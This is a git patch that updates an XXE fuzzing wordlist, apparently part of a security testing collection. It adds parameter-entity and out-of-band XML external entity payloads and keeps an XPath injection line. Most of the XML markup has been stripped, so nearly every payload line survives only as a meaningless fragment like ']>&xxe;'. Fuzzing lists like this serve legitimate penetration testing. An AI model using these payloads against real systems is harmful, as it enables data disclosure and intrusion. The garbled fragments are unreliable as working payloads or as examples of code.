From 382c44dd97dcf4d413bb9f1e74dfe0854804fdcc Mon Sep 17 00:00:00 2001 From: Alex Lauerman Date: Sat, 29 Oct 2016 20:11:36 -0500 Subject: [PATCH] Improved test cases Includes parameter entities and OOB test case. --- Fuzzing/XXE_Fuzzing.txt | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/Fuzzing/XXE_Fuzzing.txt b/Fuzzing/XXE_Fuzzing.txt index b9a1d431..8c3340c3 100644 --- a/Fuzzing/XXE_Fuzzing.txt +++ b/Fuzzing/XXE_Fuzzing.txt @@ -1,5 +1,3 @@ -# XXE_Fuzzing List - ]> ]>&foo; @@ -8,13 +6,14 @@ ]>&xxe; ]> +]>&xxe; +]> ]>&xxe; ]> ]>&xxe; ]> -]>&xxe; -]> -]> +]>&xxe; +]> ]>&xxe; ]]> @@ -42,5 +41,8 @@ x' or name()='username' or 'x'='y ]> ]> ]> -]> +]> ]> +  "> %int; +%dtd;%trick;]> +%dtd;%trick;]>